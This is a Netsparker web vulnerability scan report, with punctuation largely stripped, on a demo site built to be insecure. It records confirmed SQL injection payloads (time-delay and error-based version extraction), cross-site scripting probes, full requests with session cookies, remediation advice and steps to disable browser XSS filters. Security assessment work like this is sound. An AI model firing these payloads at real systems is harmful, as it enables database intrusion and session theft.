ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
14 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=1+WAITFOR+DELAY+2703a03a2527--
ParametersParameter Type Value
orderby GET 1 WAITFOR DELAY 0025--
RequestGET Make2orderby=1+WAITFOR+DELAY+2703a03a2527-- HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
8 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 230334 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 1811Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtMcLarens - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligt
hellip
15 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST ) WAITFOR DELAY 0025--
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 68Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=27)+WAITFOR+DELAY+2703a03a2527--
ResponseHTTP11 201 CreatedCache-Control no-cacheDate Mon 25 Aug 2014 232122 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 0Expires -1
9 57
5 TOTALCRITICAL
CONFIRMED
5
2 SQL InjectionNetsparkeridentifiedanSQLinjectionwhichoccurswhendatainputbyauserisinterpretedasanSQLcommandratherthanasnormaldatabythebackenddatabase
Thisisanextremelycommonvulnerabilityanditssuccessfulexploitationcanhavecriticalimplications
NetsparkerconfirmedthevulnerabilitybyexecutingatestSQLqueryonthebackenddatabase
ImpactDependingonthebackenddatabasethedatabaseconnectionsettingsandtheoperatingsystemanattackercanmountoneormoreofthefollowingtypeofattackssuccessfully
ReadingupdatinganddeletingarbitrarydataortablesfromthedatabaseExecutingcommandsontheunderlyingoperatingsystem
Actions to Take1 Seetheremedyforsolution2 Ifyouarenotusingadatabaseaccesslayer(DAL)considerusingoneThiswillhelpyoucentralizetheissueYoucanalsouseORM(object relational mapping)MostoftheORMsystemsuseonlyparameterizedqueriesandthiscansolvethewholeSQLinjectionproblem
3 LocateallofthedynamicallygeneratedSQLqueriesandconvertthemtoparameterizedqueries(If you decide to use a DALORM changeall legacy code to use these new libraries)
4 Useyourweblogsandapplicationlogstoseeiftherewereanypreviousbutundetectedattackstothisresource
RemedyArobustmethodformitigatingthethreatofSQLinjection-basedvulnerabilitiesistouseparameterizedqueries(prepared statements)Almostallmodernlanguagesprovidebuilt-inlibrariesforthisWhereverpossibledonotcreatedynamicSQLqueriesorSQLquerieswithstringconcatenation
Required Skills for Successful ExploitationTherearenumerousfreelyavailabletoolstoexploitSQLinjectionvulnerabilitiesThisisacomplexareawithmanydependencieshoweveritshouldbenotedthatthenumerousresourcesavailableinthisareahaveraisedbothattackerawarenessoftheissuesandtheirabilitytodiscoverandleveragethemSQLinjectionisoneofthemostcommonwebapplicationvulnerabilities
External ReferencesOWASPSQLinjectionSQLinjectionCheatsheet
Remedy ReferencesMSDN-ProtectFromSQLinjectioninASPNET
ClassificationOWASP2010-A1OWASP2013-A1PCIV20-651PCIV30-651CWE-89CAPEC-66WASC-19
21 apivote CONFIRMEDhttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101) C
Extracted Datamicrosoft sql azure (rtm) - 110922217 ntaug 20 2014 223756 ntcopyright (c) microsoft corporationn
10 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 209Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=272b+(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)+2b27
ResponsehellipPNETContent-Length 2867Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageConversion failed when converting the varchar value _2dilemma to data typeintExceptionTypeSystemDataSqlClientSqlExceptionStackTrace at SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnectionAction`1 wraphellip
22 SupercarLeaderboard CONFIRMEDhttphackyourselffirsttroyhuntcomSupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2b
ParametersParameter Type Value
orderBy GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
asc GET false
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET SupercarLeaderboardorderBy=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns)ampasc=false HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept texthtmlapplicationxhtml+xmlapplicationxmlq=09imagewebpq=08Referer httphackyourselffirsttroyhuntcomSupercarLeaderboardAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
11 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14292Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
23 Make2 CONFIRMEDhttphackyourselffirsttroyhuntcomMake2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make2orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
12 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
24 Make3 CONFIRMEDhttphackyourselffirsttroyhuntcomMake3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make3orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
13 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
25 Make1 CONFIRMEDhttphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
ParametersParameter Type Value
orderby GET (select convert(intCHAR(95) CHAR(33)CHAR(64) CHAR(50) CHAR(100)CHAR(105) CHAR(108) CHAR(101)CHAR
Extracted Datamicrosoft sql azure (rtm) - 110922217 ltbrgt aug 20 2014 223756 ltbrgt copyright (c) microsoft corporationltbrgt
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
14 57
Responsehellip30319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack
hellipltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the hellipe error and where it originated in the code
ltbrgtltbrgt
ltbgt Exception Details ltbgtSystemDataSqlClientSqlException Conversion failed when converting the varchar value _2dilemma to data type intltbrgtltbrgt
ltbgtSource Errorltbgt ltbrgtltbrgt
lttable width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegt
hellipe width=100 bgcolor=ffffccgtlttrgtlttdgtltcodegtltpregt
[SqlException (0x80131904) Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type int]SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction) +1787814SystemDataSqlClientSqlInternalConnhelliposoft NET Framework Version4030319 ASPNET Version403031936213
ltfontgt
ltbodygtlthtmlgtlt-- [SqlException] Conversion failed when converting the varchar value amp39_2dilemmaamp39 to data type intat SystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)at SystemDataSqlClientSqlInternalConnectihellip
15 57
1 TOTALIMPORTANT
CONFIRMED
1
3 Cross-site ScriptingNetsparkerdetectedcross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScript VBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofcross-sitescriptingincluding
HijackingusersactivesessionMountingphishingattacksInterceptingdataandperformingman-in-the-middleattacks
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisoutputshouldbeencodedaccordingtotheoutputlocationandcontextForexampleiftheoutputgoesintoaJavaScriptblockwithintheHTMLdocumentthenoutputneedstobeencodedaccordinglyEncodingcangetverycomplexthereforeitsstronglyrecommendedtouseanencodinglibrarysuchasOWASPESAPIandMicrosoftAnti-cross-sitescripting
Remedy ReferencesMicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
Proof of Concept NotesGeneratedXSSexploitmightnotworkduetobrowserXSSfilteringPleasefollowtheguidelinesbelowinordertodisableXSSfilteringfordifferentbrowsersAlsonotethat
XSSfilteringisafeaturethatsenabledbydefaultinsomeofthemodernbrowsersItshouldonlybedisabledtemporarilytotestexploitsandshouldberevertedbackifthebrowserisactivelyusedotherthantestingpurposesEventhoughbrowsershavecertaincheckstopreventCross-sitescriptingattacksinpracticethereareavarietyofwaystobypassthismechanismthereforeawebapplicationshouldnotrelyonthiskindofclient-sidebrowserchecks
Chrome
OpencommandpromptGotofolderwherechromeexeislocatedRunthecommandchromeexe --args --disable-xss-auditor
InternetExplorer
ClickTools-gtInternetOptionsandthennavigatetotheSecurityTabClickCustomlevelandscrolltowardsthebottomwhereyouwillfindthatEnableXSSfilteriscurrentlyEnabledSetittodisabledClickOKClickYestoacceptthewarningfollowedbyApply
Firefox
GotoaboutconfigintheURLaddressbarInthesearchfieldtypeurlbarfilterandfindbrowserurlbarfilterjavascriptSetitsvaluetofalsebydoubleclickingtherow
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
16 57
31 Search CONFIRMEDhttphackyourselffirsttroyhuntcomSearchsearchTerm=2Bnetsparker(9)2B
ParametersParameter Type Value
searchTerm GET +netsparker(9)+
RequestGET SearchsearchTerm=2Bnetsparker(9)2B HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
Responsehellipltsectiongtltdivgtltdivgtltdivgtltdivgtltheadergt
ltdiv class=containergtltsectiongt
lth2gtYou searched for ampquotltspan id=searchTermgt+netsparker(9)+ltspangtampquotlth2gt
ltp class=alert alert-errorgtNo results found for your searchltpgt
ltsectiongtlthrgtltfootergtltpgtampcopy 2014 - Hack Yourself Firstltpgtltfootergt
hellipgtltscriptgt
ltscriptgt$(results tr)click(function () var url = Supercar + $(this)attr(id)windowlocationhref = url)
$(searchTerm)val(+netsparker(9)+)ltscriptgt
ltscriptgt(function (i s o g r a m) i[GoogleAnalyticsObject] = r i[r] = i[r] || function () (i[r]q = i[r]q || [])push(arguments) i[rhellip
17 57
1 TOTALIMPORTANT
CONFIRMED
1
4 Permanent Cross-site ScriptingNetsparkeridentifiedpermanentcross-sitescriptingandconfirmedthisvulnerabilitybyanalyzingtheexecutionofinjectedJavaScript
PermanentXSSallowsanattackertoexecutedynamicscripts(JavaScript VBScript)inthecontextoftheapplicationThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbytheuserhasbeeninterpretedbyHTMLJavaScriptVBScriptwithinthebrowser
PermanentmeansthattheattackwillbestoredinthebackendsystemInnormalXSSattacksanattackerneedstoe-mailthevictimbutinapermanentXSSanattackercanjustexecutetheattackandwaitforuserstoseetheaffectedpageAssoonassomeonevisitsthepagetheattackersstoredpayloadwillgetexecuted
XSStargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitonlyallowsattackerstohijackotheruserssessionstheattackermightattackanadministratortogainfullcontrolovertheapplication
ImpactPermanentXSSisadangerousissuethathasmanyexploitationvectorssomeofwhichinclude
Userssession-sensitiveinformationsuchascookiescanbestolenXSScanenableclient-sidewormswhichcouldmodifydeleteorstealotherusersdatawithintheapplicationThewebsitecanberedirectedtoanewlocationdefacedorusedasaphishingsite
RemedyTheissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredOutputshouldbefilteredaccordingtotheoutputformatandlocationTypicallytheoutputlocationisHTMLWheretheoutputisHTMLensureallactivecontentisremovedpriortoitspresentationtotheserver
Priortosanitizinguserinputensureyouhaveapre-definedlistofbothexpectedandacceptablecharacterswithwhichyoupopulateawhitelistThislistneedsonlybedefinedonceandshouldbeusedtosanitizeandvalidateallsubsequentinput
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsgoodexamplesoftheseincludetheOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheetOWASPAntiSamyJava
External ReferencesXSSCheatSheetOWASP-Cross-siteScriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
41 Supercar3 CONFIRMEDhttphackyourselffirsttroyhuntcomSupercar3
Injection URLhttphackyourselffirsttroyhuntcomapivote
18 57
